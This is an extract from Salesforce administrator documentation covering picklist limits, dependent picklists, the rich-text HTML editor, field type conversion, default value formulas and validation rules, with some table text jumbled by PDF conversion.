To edit, from Setup, click Customize > Opportunities >
Contact Roles.

Each picklist value can have up to 40 characters.

Sales process stages, for example, Prospect, Proposal. This
picklist also affects the Type and Forecast Category

Stage (for opportunities)

values of an opportunity. Specifically, changing the Type or
Forecast Category for a Stage picklist value updates all
opportunities that have that stage value.

To edit, from Setup, click Customize > Opportunities >
Fields, and select Edit next to the field.
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DescriptionPicklist

To deactivate an active stage, click Del next to the stage. On
the mapping page, don't replace the stage with another existing
value; just click Save. The stage now appears in the Inactive
Stage Picklist Values related list. The stage is no longer in use
but may exist in older opportunity records.

Status of a solution, for example, Draft, Reviewed. Mark one
or more values as “Reviewed”. When users solve cases using

Status (for solutions)

solutions, they can view which solutions have been reviewed
and which have not. Each picklist value can have up to 40
characters.

Importance of the task, for example, High, Normal, Low. Set
one value as the default priority of all new tasks, and one value
as the highest priority.

If you delete a value, you have the option to map the deleted
value to another existing value in all of your organization’s
tasks.

Priority (for tasks)

Each picklist value can have up to 20 characters.

State of a task, for example, Not Started, Completed. Choose
at least one value as the “Closed” status and one value as the
“Default” status for all new tasks.

If you delete a value, you have the option to map the deleted
value to another existing value in all of your organization’s
tasks.

Status (for tasks)

Each picklist value can have up to 40 characters.

Send Email Default specifies the default task type
assigned when the task is sending email or mass email, and

Task Type (for tasks)

when tasks are created via inbound email, such as Email to
Salesforce. Default specifies the default picklist value when
creating tasks.

To edit, from Setup, click Customize > Activities > Task
Fields, and select Edit next to the picklist value you want to
specify as the default.

See Also:
Picklist Limitations
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Picklist Limitations

Available in: All Editions

Standard Picklists are not available in Database.com

User Permissions Needed

“Customize Application”To change picklists:

The maximum number of entries you can have in a picklist is determined by the total number of characters allowed in the
picklist, which is 15,000 characters. Note that each entry includes a linebreak and a return character that are not visible. These
two additional characters per entry are counted as part of the 15,000 character limit.

Additional limits apply to both standard and custom picklists.

Additional Limits for Standard Picklists

For standard picklists, entries can be up to 40 characters, not including linebreaks and returns. For standard multi-select
picklists, the total number of characters for all entries cannot exceed 255.

For standard picklists in organizations that use record types or the Translation Workbench, you can have an unlimited number
of entries with the following exceptions for special picklists.

Maximum Number of EntriesPicklist Field

100Lead Status

100Task Status

50Task Priority

100Case Status

50Case Priority

100Opportunity Stage

Additional Limits for Custom Picklists

Within the 15,000 total character limit, custom picklists can have:

• Up to 1,000 entries
• Up to 255 characters per entry

Custom multi-select picklists can have:

• Up to 150 values
• Up to 40 characters per value

Note that for multi-select picklists, users can select up to 100 values at a time on a record.
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Replacing Picklist Values

Available in: All Editions

User Permissions Needed

“Customize Application”To replace picklist values:

You may need to replace a picklist value with another. For example, your status picklist has five values (Open, In Progress,
Closed-red, Closed-yellow, and Closed-green) and you want to simplify it to three values (Open, In Progress, and Closed).
You need to replace the Closed-red, Closed-yellow, and Closed-green values with a new value: Closed.

Note:  Replacing an existing picklist value also changes the Modified By date and time for the record.

To globally replace the values of picklist fields in existing records follow the steps below.

1. If necessary, create the replacement value in the picklist edit page. See Updating Picklists.
2. Navigate to the fields area of the appropriate object:

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom task and event fields, from Setup, click Customize > Activities > Activity Custom Fields.
• For standard task and event fields, from Setup, click Customize > Activities, then click Task Fields or Event Fields.
• For custom objects, from Setup, click Create > Objects, and select an object.
• For Knowledge validation status picklists, from Setup, click Customize > Knowledge > Validation Statuses.

3. Click Replace next to the picklist.
4. Type the exact value you want to change, and select a new replacement value.
5. To apply the new value on any records with a blank value in this field, check Replace all blank values.
6. To update all occurrences of the value in your organization’s records with the new value, click Replace. Occurrences in

the Recycle Bin are also updated.
7. On the Replace Picklist Confirmation page, click Finished.

Note:  If you replace the Stage picklist for opportunities, the Probability, Forecast Category, and Expected
Revenue fields are also updated with the corresponding values.
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Sorting Picklists

Available in: All Editions

User Permissions Needed

“Customize Application”To sort picklists:

You can sort the values of picklist fields.

1. Navigate to the appropriate object:

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom task and event fields, from Setup, click Customize > Activities > Activity Custom Fields.
• For standard task and event fields, from Setup, click Customize > Activities, then click Task Fields or Event Fields.
• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
• For Knowledge validation status picklists, from Setup, click Customize > Knowledge > Validation Statuses.

2. Click Edit next to the picklist you want to update.
3. Click Reorder.
4. Use the arrows to arrange the field in the proper sequence.
5. Select a default, if desired.
6. Check the box to alphabetize the entries for users on edit pages. The entries will always appear in alphabetical order,

regardless of the user’s language.
7. Click Save.

Note:  On record edit and detail pages and in reports, picklist and multi-select picklist fields may include inactive
values. These inactive values are sorted last, unless you have chosen alphabetical sorting. In that case, all values are
sorted alphabetically.

Defining Dependent Picklists
Available in: All Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To define dependent picklists:

To define a dependent picklist:

1. Navigate to the fields area of the appropriate object.
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For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.•
• For custom task and event fields, from Setup, click Customize > Activities > Activity Custom Fields.
• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
• For custom settings, from Setup, click Develop > Custom Settings, and click the name of the custom setting.

2. Click Field Dependencies.
3. Click New.
4. Choose a controlling field and dependent field.

Note:  Some picklist and checkbox fields may not be available as controlling fields.

5. Click Continue.
6. Use the field dependency matrix to specify the dependent picklist values that are available when a user selects each controlling

field value.
7. Optionally, click Preview to test your selections. If your organization uses record types, choose a record type to test how

it affects your controlling and dependent picklist values. The record type controls what values are available in the controlling
field. The record type and the controlling field together determine what values are available in the dependent picklist. For
example, a dependent value is only available if it is available in the selected record type as well as the selected controlling
value.

Note:  The Filter by Record Type option does not appear in the Preview window for activity custom fields.

8. Click Save.
9. If your organization uses record types, make sure that your controlling and dependent picklist values are available in the

appropriate record types.

See Also:
Dependent Picklist Considerations
Editing Dependent Picklists
Deleting Picklist Dependencies

About Dependent Picklists

Available in: All Editions

Use dependent picklists to help your users enter accurate and consistent data. A dependent picklist is a custom or multi-select
picklist for which the valid values depend on the value of another field, called the controlling field. Controlling fields can be
any picklist (with at least one and fewer than 300 values) or checkbox field on the same record.

For example, you can define a Reason custom picklist on opportunities and make its valid values depend on the value of the
Stage picklist as follows:
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• If Stage is Closed Won, the valid values for Reason are Superior features or Lower price.

• If Stage is Closed Lost, the valid values for Reason are Inferior features, Higher price, or Company
viability.

See Also:
Defining Dependent Picklists
Dependent Picklist Considerations

Using the Field Dependency Matrix

Available in: All Editions

User Permissions Needed

“Customize Application”To define picklist dependencies:

The field dependency matrix lets you specify the dependent picklist values that are available when a user selects each controlling
field value. The top row of the matrix contains the controlling field values, while the columns list the dependent field values.

Use this matrix to include or exclude values. Included values are available in the dependent picklist when a value in the
controlling field is selected. Excluded fields are not available in the dependent picklist for the selected controlling field value.

To include or exclude values:

• Double-click values to include them. Included values are indicated with highlighting. Double-click any highlighted values
to exclude them.

• Click a value and use SHIFT+click on another value to select a range of adjacent values. Then click Include Values to
make the values available, or Exclude Values to remove them from the list of available values.

• Click a value and use CTRL+click to select multiple values. Then click Include Values to make the values available, or
Exclude Values to remove them from the list of available values.

• Click a column header to select all the values in that column. Then click Include Values to make the values available, or
Exclude Values to remove them from the list of available values.

To change the values in your view:

• Click View All to view all available values at once.

• Click Go To and choose a controlling value to view all the dependent values in that column.

• Click Previous or Next to view the values in columns that are on the previous or next page.

• Click View sets of 5 to view 5 columns at a time.
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Editing Dependent Picklists

Available in: All Editions

User Permissions Needed

“Customize Application”To edit field dependencies:

To edit dependent picklists:

1. Navigate to the fields area of the appropriate object.

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom task and event fields, from Setup, click Customize > Activities > Activity Custom Fields.
• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
• For custom settings, from Setup, click Develop > Custom Settings, and click the name of the custom setting.

2. Click Field Dependencies.
3. Click Edit next to the field dependency relationship you want to change.
4. Use the field dependency matrix to specify the dependent picklist values that are available when a user selects each controlling

field value.
5. Optionally, click Preview to test your selections.
6. Click Save.

Deleting Picklist Dependencies

Available in: All Editions

User Permissions Needed

“Customize Application”To delete picklist dependencies:

If you no longer want the values of a dependent picklist to depend on a controlling field, delete its dependency. Deleting the
dependency removes the logic that defines how the values of the picklist depend on the controlling field, but doesn't delete
the fields or affect their data.

To delete picklist dependencies:

1. For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
2. For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
3. Click Field Dependencies.
4. Click Del next to the field dependency relationship you want to delete.
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5. Click OK to confirm.

Dependent Picklist Considerations

Available in: All Editions

Page Layouts and Leads are not available in Database.com

User Permissions Needed

“Customize Application”To define and edit dependent picklists:

Consider the following when defining dependent picklists:

Checkboxes

Checkbox fields can be controlling fields but not dependent fields.

Converting fields

Convert your existing fields to dependent picklists or controlling fields without affecting the existing values in your
records. Going forward, dependency rules apply to any changes to existing records or new records.

Default values

You can set default values for controlling fields but not for dependent picklists.

Field-level security

Field-level security settings for a controlling field and dependent picklist are completely independent. Remember to hide
controlling fields whenever its correlating dependent picklist is hidden.

Import

The import wizards do not consider field dependencies. Any value can be imported into a dependent picklist regardless
of the value imported for a controlling field.

Lead conversion

If you create a dependency for lead fields that map to account, contact, and opportunity fields for lead conversion, create
the same dependency on the account, contact, or opportunity as well.

Dependent picklists and controlling lead fields can be mapped to account, contact, or opportunity fields with different
dependency rules.

Multi-select picklists

Multi-select picklists can be dependent picklists but not controlling fields.

Connect Offline

While controlling fields and dependent picklists are available in Connect Offline, the logic between them is not.
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Page layouts

Make sure controlling fields exist on any page layout that contains their associated dependent picklist. When the
controlling field is not on the same page layout, the dependent picklist shows no available values.

For visually-impaired users, make sure the dependent picklist is lower on the page layout than its controlling field.

If a dependent picklist is required and no values are available for it based on the controlling field value, users can save
the record without entering a value. The record is saved with no value for that field.

Picklist limitations

Custom picklist fields can be either controlling or dependent fields.

Standard picklist fields can be controlling fields but not dependent fields.

The maximum number of values allowed in a controlling field is 300. In addition, if a field is both a controlling field
and dependent picklist, it can't contain more than 300 values.

Before defining a dependency, make sure your picklist has at least one value; standard fields like Product Family do
not contain any values until you add them.

If a standard controlling field relies on functionality that your organization decides to disable, the dependency rules for
the picklist will go away. For example, if your organization disables the Self-Service portal and the Closed by
Self-Service User is a controlling field, its dependent picklist will display all available values.

The following fields are not available as controlling fields:

Activity Fields

Call Type

Create recurring series of events

Show Time As

Subject

Task

Type

Contact Fields

Salutation

Contact Currency

Custom Object Fields

Currency

Lead Fields

Converted

Unread By Owner

Record types

The values in your controlling fields are determined by the record type selected. The values in your dependent picklists
are determined by the record type and controlling field value selected. In short, the values available in dependent picklists
are an intersection of the record type and controlling field selections.
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Using the HTML Editor
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create or change custom fields:

To improve the appearance of text in custom fields, use the Salesforce HTML editor to format custom fields that were defined
with the rich text area custom field type. The Salesforce HTML editor provides a WYSIWYG interface, allowing you to
perform basic formatting operations. You can:

• Format text as bold, italicized, or underlined

• Create bulleted and numbered lists

• Change paragraph indentation

• Insert hyperlinks to Web pages

• Insert an image

Some features, such as Salesforce Knowledge or Ideas, let administrators enable extra functions like the ability to embed
multimedia content, use drop-down lists, or select colors for text or backgrounds. Make sure that your browser security settings
allow you to access these functions.  For example, if browser security is set to high in Internet Explorer 7, <iframe> content
does not appear in the frame, drop-down lists are unavailable, and color cannot be selected for backgrounds or text.

Common scenarios for the HTML editor include:

• Adding a video to a knowledge article or an Idea Themes posting.

• Formatting resumes submitted by job candidates to create more readable and professional-looking versions for your users

• Emphasizing key points in a Description or Comments field by setting various font options, such as bold typeface and a
larger font size

• Itemizing steps in a numbered or bulleted list to help users better understand a procedure

• Supporting your company's brand identity by specifying the URL of a logo on your website

• Including a link to a related and accessible page of your company's website

Notes on Using the Salesforce HTML Editor

When you use the editor, note the following:

• Because the Salesforce HTML editor provides a WYSIWYG interface only, you do not edit HTML tags.
• If you copy content from a Web page and paste it into the editor's window, Salesforce automatically removes unsupported

tags and may preserve the text that was enclosed in unsupported tags as plain text. Note that Salesforce does not notify
users when it removes unsupported or potentially malicious HTML.

• The maximum number of characters you can enter in the Salesforce HTML editor window is equal to the field length
specified when creating or editing the field. The default is 32,768 characters.

• When clicked, hyperlinks open in a new browser window. The Salesforce HTML editor supports HTTP, HTTPS, and
mailto hyperlinks.

• When a record is saved, the Salesforce HTML editor does not validate hyperlinks to Web pages. Be sure to confirm that
you are specifying a URL that Salesforce can access.
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• To insert an image, click  and either select:

◊ Web Address tab and enter the URL of the image.
◊ Upload Image tab and select an image from your localhost. You can only upload JPEG, PNG or GIF. The image you

select cannot exceed 1 Megabyte. You can't add a hyperlink to an image.

Optionally, enter a description that appears when a user hovers over the image. The image must have a URL that Salesforce
can access.

• The Salesforce HTML editor supports all languages that Salesforce Knowledge supports.
• The Salesforce HTML editor does not support JavaScript or Cascading Style Sheets (CSS).
• The Salesforce HTML editor is disabled for users who have accessibility mode enabled; it's replaced with a text box.

Supported HTML Tags and Attributes

The Salesforce HTML editor supports the tags listed in the following table.

<q><dt><a>

<samp><em><abbr>

<small><font><acronym>

<span><h1><address>

<strike><h2><b>

<strong><h3><bdo>

<sub><h4><big>

<sup><h5><blockquote>

<table><h6><br>

<tbody><hr><caption>

<td><i><cite>

<tfoot><img><code>

<th><ins><col>

<thead><kbd><colgroup>

<tr><li><dd>

<tt><ol><del>

<ul><p><dfn>

<var><pre><div>

<dl>

The tags can include the following attributes:

sizefacealt

srcheightbackground
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stylehrefborder

targetnameclass

widthrowspancolspan

The attributes can include URLs that begin with the following:

• http:

• https:

• file:

• ftp:

• mailto:

• #

• / for relative links

See Also:
Using Rich Text Area Fields
Adding Videos Using the HTML Editor

Adding Videos Using the HTML Editor

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create or change custom fields:

Before you can add videos to the HTML editor, make sure that your browser security settings allow you to embed multimedia
content. Some browser security settings can block <iframe> elements.  For example, if browser security is set to high in
Internet Explorer 7, <iframe> content does not appear in the frame.

When the option to embed multimedia content is enabled during the setup of your application, users can cut and paste
<iframe> HTML elements into the editor using one of two options:

1. Copy the <iframe> element from one of the approved video sites.

Approved sites include Dailymotion, Vimeo, or YouTube.

2. Paste the code into the HTML editor by clicking one of these buttons:

DescriptionOption

Lets you paste the <iframe> element into a text box on
the Embed Multimedia Content dialog box. The frame and
its contents are added to the editor window.
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DescriptionOption

Lets you paste the <iframe> element directly into the
HTML code.

3. Click Save.

See Also:
Using the HTML Editor

Changing Custom Field Type
Available in: All Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To change custom fields:

To change the data type of an existing custom field:

1. For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
2. For fields on Salesforce Knowledge article types, from Setup, click Customize > Knowledge > Article Types and select

an article type. The article-type detail page has a Fields related list.
3. For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
4. Click Edit next to the custom field you want to change.
5. Click Change Field Type.
6. Select a new data type and click Next.
7. Enter a field label, name, any other attributes, and click Save.

For more information, see Notes on Changing Custom Field Types on page 2958.

See Also:
Notes on Changing Custom Field Types
Custom Field Types

Notes on Changing Custom Field Types
Consider the following before converting fields:
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• Only convert custom fields for which no data exists or you risk losing your data. Changing the data type of an existing
custom field can cause data loss in the following situations:

◊ Changing to or from type Date or Date/Time

◊ Changing to Number from any other type

◊ Changing to Percent from any other type

◊ Changing to Currency from any other type

◊ Changing from Checkbox to any other type

◊ Changing from Picklist (Multi-Select) to any other type

◊ Changing to Picklist (Multi-Select) from any other type

Currently defined picklist values are retained when you change a picklist to a multi-select picklist. If records contain
values that are not in the picklist definition, those values will be deleted from those records when the data type changes.

◊ Changing from Auto Number to any other type

◊ Changing to Auto Number from any type except Text

◊ Changing from Text to Picklist

◊ Changing from Text Area (Long) to any type except Email, Phone, Text, Text Area, or URL

• If data is lost, any list view based on the custom field will be deleted, and assignment and escalation rules may be affected.

• If you change the data type of any custom field that is used for lead conversion, that lead field mapping will be deleted.

• If you change the data type of a custom field that is set as an external ID, choosing a data type other than text, number,
or email will cause the field to no longer act as an external ID.

• The option to change the data type of a custom field is not available for all data types. For example, existing custom fields
cannot be converted into encrypted fields nor can encrypted fields be converted into another data type.

• In Salesforce Knowledge article types, the file field type can't be converted into other data types.

• You cannot change the data type of a custom field that is referenced by a Visualforce page.

• Changing a custom field type may require changing a large number of records at once. To process these changes efficiently,
your request may be queued and you may receive an email notification when the process has completed.

• Before changing a custom field’s type, make sure that it isn’t the target of a workflow field update or referenced in a field
update formula that would be invalidated by the new type.

The following data types have additional restrictions when you convert them:

DescriptionData Type

The data in any auto-number field remains unchanged if you
convert it into a text field. Also, you can safely convert a text

Auto Number

custom field into an auto-number field without losing your
data. Converting an auto-number field into any other data
type results in data loss. Auto-number fields can contain a
maximum of 30 characters. Before converting a text custom
field into an auto-number field, change any records that
contain more than 30 characters in that field.

Formula fields are special read-only fields that cannot be
converted to any other data type. Likewise, you cannot convert
any other field type into a formula field.

Formula
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DescriptionData Type

Changing your custom picklists into custom checkboxes is
simple. If you select Checkbox as the new data type, you can

Picklist

choose which picklist values to map to checked boxes and
unchecked boxes. You can change custom picklists into
multi-select picklists without losing any data. Since your
records only contain a single value of that picklist, that value
will still be selected but users can select additional values.

Relationships • If your organization has a large number of records,
Salesforce displays a waiting page after you have requested
to change a master-detail into a lookup relationship or a
lookup into a master-detail relationship.

• After you have created a roll-up summary field on an
object, you cannot convert the object's master-detail
relationship into a lookup relationship.

• A lookup cannot be converted to a master detail
relationship if there are any existing records on the object
that have a null value set for the lookup relationship.

• If you are converting a master-detail relationship to a
lookup for a custom object on the “detail” side, the
organization-wide default for the object is automatically
updated to Public Read/Write. Similarly, converting a
lookup to a master-detail-relationship changes the
organization-wide default to Controlled by Parent

When you convert a long text area field to an Email, Phone,
Text, Text Area, or URL type field, the data in your records
is truncated to the first 255 characters of the field.

Text Area (Long)

You can only convert rich text area fields into long text area
fields. Any images are deleted the next time the long text area

Text Area (Rich)

field is saved. After converting, markup is hidden in the long
text area field but it is not removed from the record until you
save the record. That way, the markup can be restored if you
change your mind.

Note:  You cannot change the data type of a custom field if it is referenced in Apex.

See Also:
Changing Custom Field Type

2960

Changing Custom Field TypeEnhancing Your Objects, Data, and Fields



Defining Default Field Values
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view default field values:

“Customize Application”To define or change default field values:

To define a default field value:

1. Begin by creating a custom field; see Creating Custom Fields on page 2922. You can also define a default value for an existing
custom field; see Editing Fields on page 2934.

2. Choose the type of field to create and click Next. For a list of the types available for default values, see About Default Field
Values on page 2962.

3. Enter the attributes for the field.
4. Enter a default value or define a formula to calculate the default value.

Note:  You can define a formula for default values only where appropriate. For example, the default value options
for picklist and checkbox fields are limited to the options available for those types of fields, such as Checked,
Unchecked, or Use first value as default value.

5. Click Next.
6. Set the field-level security to determine whether the field should be visible for specific profiles, and click Next.
7. Choose the page layouts that should display the field. The field is added as the last field in the first two-column section

on the page layout. For user custom fields, the field is automatically added to the bottom of the user detail page.
8. Click Save to finish or Save & New to create more custom fields.

Note: You must specify a default value for required campaign member custom fields.

Default values should not be assigned to fields that are both required and unique, as uniqueness errors may result.

See Also:
About Default Field Values
Default Field Value Considerations
Useful Default Field Value Formulas
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About Default Field Values

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Use default field values to make your users more productive by reducing the number of fields they need to fill in manually.
Default field values automatically insert the value of a custom field when a new record is created. A default value can be based
on a formula for some types of fields or exact values such as Checked or Unchecked for checkbox fields.

After you have defined default values:

1. The user chooses to create a new record.
2. Default field value is executed.
3. Salesforce displays the edit page with the default field value pre-populated.
4. The user enters the fields for the new record.
5. The user saves the new record.

The user can change the field's value but the initial default field value is only executed once, during record creation. For
example, you can set the default field value on a custom lead field to seven days after the creation date to signify when to
contact the lead again. You can change this value later, but you cannot automatically restore the value that was seven days after
the creation date.

Set up default field values for the following types of custom fields:

• Checkbox

• Currency

• Date

• Date/Time

• Email

• Number

• Percent

• Phone

• Picklist (use the default option when setting up the picklist)

• Text

• Text Area

• URL

For a description of these types, see Custom Field Types on page 2924.

See Also:
Defining Default Field Values
Default Field Value Considerations
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Useful Default Field Value Formulas

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view default field values:

“Customize Application”To define or change default field values:

Maximum Discount Rate

Your organization my apply different discount rates to opportunities based on the department of the person creating the
opportunity. Use the following example to set a default value for a custom field called Discount Rate on opportunities.

CASE(User.Department, "IT", 0.25, "Field", 0.15, 0)

In this example, the formula inserts a discount rate of 25% on any opportunity created by a user in the “IT” department or
15% on any opportunity created by someone in the “Field” department. A zero is applied if the creator does not belong to
either of these departments. This is a custom percent field on opportunities that uses the standard user field Department.

Product Language

You may want to associate a product with its language so that your users know the type of documentation or adapter to include.
Use the following default value formula to automatically set the language of a product based on the country of the user creating
the product. In this example, the default value is “Japanese” if the user's country is “Japan” and “English” if the user's country
is “US.” If neither is true, the default value “unknown” is inserted into the Product Language field.

CASE($User.Country , "Japan", "Japanese", "US", "English","unknown")

Tax Rate

Use this default value formula to set the tax rate of an asset based on the user's city. Create a custom percent field with the
following default value:

IF($User.City = "Napa", 0.0750,
IF($User.City = "Paso Robles", 0.0725,
IF($User.City = "Sutter Creek", 0.0725,
IF($User.City = "Los Olivos", 0.0750,
IF($User.City = "Livermore", 0.0875, null
)
)
)
)
)

2963

Defining Default Field ValuesEnhancing Your Objects, Data, and Fields



In this example, a tax rate of 8.75% is applied to an asset when the user's address is in the city of Livermore. When none of
the cities listed apply, the Tax Rate field is empty. You can also use the Tax Rate field in formulas to automatically calculate
taxable amounts and final sales prices.

See Also:
Defining Default Field Values
Default Field Value Considerations

Default Field Value Considerations

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Default field values automatically insert the value of a custom field when a new record is created. A default value can be based
on a formula for some types of fields or exact values such as Checked or Unchecked for checkbox fields. Review the following
considerations before incorporating default field values in your organization.

• If a default value is based on the value of a merge field, Salesforce uses the value of the merge field at the time the default
value is executed. If the value of the merge field changes later, the default value is not updated.

• Users can change or remove the default field value on a record.

• Default values should not be assigned to fields that are both required and unique, as uniqueness errors may result.

• If you make an activity custom field universally required, you must also provide a default value.

• If an activity custom field is unique, you cannot provide a default value.

• Default field values are different from formula fields in the following ways: they are only executed once, at record creation;
they are not read only; and the user can change the value but cannot restore the default field value.

• Since the default value is inserted before users enter any values in the new record, you cannot use the fields on the current
record to create a default field value. For example, you cannot create a default field value on a contact that uses the first
initial and last name because those values are not available when you click New to create a contact record. However, you
can use the record type because it is selected before the record edit page displays.

• To apply a different default value for different record types, use the record type as a merge field in a CASE function within
the default field value setup.

• Fields that are not visible to the user due to field-level security are still available in the formula for a default field value.

• Connect Offline, Connect for Lotus Notes, Connect for Outlook, and Salesforce for Outlook do not display default values.
However, Salesforce inserts the default values when a user syncs unless the user entered a value.

• Default field values are not available in the Self-Service portal.

• Lead conversion, Web-to-Lead, and Web-to-Case do not execute default field values.
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Note:  You can define a formula for default values only where appropriate. For example, the default value options for
picklist and checkbox fields are limited to the options available for those types of fields, such as Checked, Unchecked,
or Use first value as default value.

See Also:
Defining Default Field Values
Useful Default Field Value Formulas

About Validation Rules
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Improve the quality of your data using validation rules. Validation rules verify that the data a user enters in a record meets the
standards you specify before the user can save the record. A validation rule can contain a formula or expression that evaluates
the data in one or more fields and returns a value of “True” or “False”. Validation rules also include an error message to display
to the user when the rule returns a value of “True” due to an invalid value.

After you have defined validation rules:

1. The user chooses to create a new record or edit an existing record.
2. The user clicks Save.
3. All validation rules are verified.

• If all data is valid, the record is saved.
• If any data is invalid, the associated error message displays without saving the record.

4. The user makes the necessary changes and clicks Save again.

You can specify the error message to display when a record fails validation and where to display it. For example, your error
message can be “The close date must occur after today's date.” You can choose to display it near a field or at the top of the
page. Like all other error messages, validation rule errors display in red text and are preceded by the word “Error”.

Important: Validation rules apply to new and updated records for an object, even if the fields referenced in the
validation rule are not included in a page layout or an API call. Validation rules don't apply if you create new records
for an object with Quick Create. If your organization has multiple page layouts for the object on which you create a
validation rule, verify that the validation rule functions as intended on each layout. If your organization has any
integrations that use this object, verify that the validation rule functions as intended for each integration.

See Also:
Defining Validation Rules
Validation Rules Fields
Examples of Validation Rules
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Managing Validation Rules

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Validation rules verify that the data a user enters in a record meets the standards you specify before the user can save the record.
A validation rule can contain a formula or expression that evaluates the data in one or more fields and returns a value of “True”
or “False”. Validation rules also include an error message to display to the user when the rule returns a value of “True” due to
an invalid value.

From the validation rules page you can:

• Define a validation rule.

• Click Edit next to a rule name to update the rule fields.

• Delete a validation rule.

• Click a validation rule name to view more details or to clone the rule.

• Activate a validation rule.

See Also:
About Validation Rules
Examples of Validation Rules

Defining Validation Rules

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view field validation rules:

“Customize Application”To define or change field validation rules:

Validation rules verify that the data a user enters in a record meets the standards you specify before the user can save the record.
A validation rule can contain a formula or expression that evaluates the data in one or more fields and returns a value of “True”
or “False”. Validation rules also include an error message to display to the user when the rule returns a value of “True” due to
an invalid value.

Before creating validation rules, review the Validation Rule Considerations.

1. Navigate to the relevant object, field, campaign member, or case milestone.

• For standard objects, from Setup, click Customize, select the appropriate object, and click Validation Rules.
• For custom objects, from Setup, click Create > Objects and select the custom object.

• To create a validation rule for the field in Ideas, from Setup, click Customize > Ideas > Validation Rules.
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• To create validation rules for Idea Comments, from Setup, click Customize > Ideas > Idea Comments > Validation
Rules.

• To create validation rules for campaign members, from Setup, click Customize > Campaigns > Campaign Member
> Validation Rules.

• To create validation rules for case milestones (entitlement management must be enabled), from Setup, click Customize
> Cases > Case Milestones > Validation Rules.

2. In the Validation Rules related list, click New.
3. Enter the properties of your validation rule.
4. To check your formula for errors, click Check Syntax.
5. Click Save to finish or Save & New to create additional validation rules.

Note:  The detail page of a custom activity field does not list associated validation rules. To edit the validation rule
for a custom activity field, select the validation rule from Setup by clicking Customize > Activities and choose Task
Validation Rules or Event Validation Rules.

See Also:
About Validation Rules
Cloning Validation Rules
Tips for Writing Validation Rules
Examples of Validation Rules

Cloning Validation Rules

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view field validation rules:

“Customize Application”To define or change field validation rules:

1. Navigate to the relevant object, field, campaign member, or case milestone.

• For standard objects, from Setup, click Customize, select the appropriate object, and click Validation Rules.
• For custom objects, from Setup, click Create > Objects and select the custom object.

• To create a validation rule for the field in Ideas, from Setup, click Customize > Ideas > Validation Rules.

• To create validation rules for Idea Comments, from Setup, click Customize > Ideas > Idea Comments > Validation
Rules.

• To create validation rules for campaign members, from Setup, click Customize > Campaigns > Campaign Member
> Validation Rules.
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• To create validation rules for case milestones (entitlement management must be enabled), from Setup, click Customize
> Cases > Case Milestones > Validation Rules.

2. In the Validation Rules related list, click the name of the validation rule.
3. Click Clone.
4. Define the new rule based on the original rule.
5. Click Save to finish or Save & New to create additional validation rules.

Note:  The detail page of a custom activity field does not list associated validation rules. To edit the validation rule
for a custom activity field, select the validation rule from Setup by clicking Customize > Activities and choose Task
Validation Rules or Event Validation Rules.

See Also:
Defining Validation Rules
Validation Rules Fields
Activating Validation Rules

Activating Validation Rules

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view field validation rules:

“Customize Application”To define or change field validation rules:

1. Navigate to the relevant object, field, campaign member, or case milestone.

• For standard objects, from Setup, click Customize, select the appropriate object, and click Validation Rules.
• For custom objects, from Setup, click Create > Objects and select the custom object.

• To create a validation rule for the field in Ideas, from Setup, click Customize > Ideas > Validation Rules.

• To create validation rules for Idea Comments, from Setup, click Customize > Ideas > Idea Comments > Validation
Rules.

• To create validation rules for campaign members, from Setup, click Customize > Campaigns > Campaign Member
> Validation Rules.

• To create validation rules for case milestones (entitlement management must be enabled), from Setup, click Customize
> Cases > Case Milestones > Validation Rules.

2. Click Edit next to the rule you want to activate.
3. To activate the rule, select Active, and click Save.
4. To deactivate the rule, deselect Active, and click Save.
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Note:  The detail page of a custom activity field does not list associated validation rules. To activate the validation
rule for a custom activity field, select the validation rule from Setup by clicking Customize > Activities and choose
Task Validation Rules or Event Validation Rules.

See Also:
Defining Validation Rules
Validation Rules Fields

Validation Rules Fields

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

DescriptionField

Unique identifier of up to 40 characters with no spaces or special characters such as
extended characters.

Rule Name

Checkbox that indicates if the rule is enabled.Active

A 255-character or less description that distinguishes the validation rule from others.
For internal purposes only.

Description

The expression used to validate the field. See Building Formulas and Formula
Operators and Functions.

Error Condition Formula

The message that displays to the user when a field fails the validation rule.

If your organization uses the Translation Workbench, you can translate the error
message into the languages Salesforce supports. See Setting Up the Translation
Workbench.

Error Message

Determines where on the page to display the error. To display the error next to a
field, choose Field and select the field. If the error location is a field, the validation

Error Location

rule is also listed on the detail page of that field. If the error location is set to a field
that is later deleted, to a field that is read only, or to a field that isn’t visible on the
page layout, Salesforce automatically changes the location to Top of Page.

Note:  Error messages can only be displayed at the top of the page in
validation rules for case milestones and Ideas.

See Also:
Defining Validation Rules
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Tips for Writing Validation Rules

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

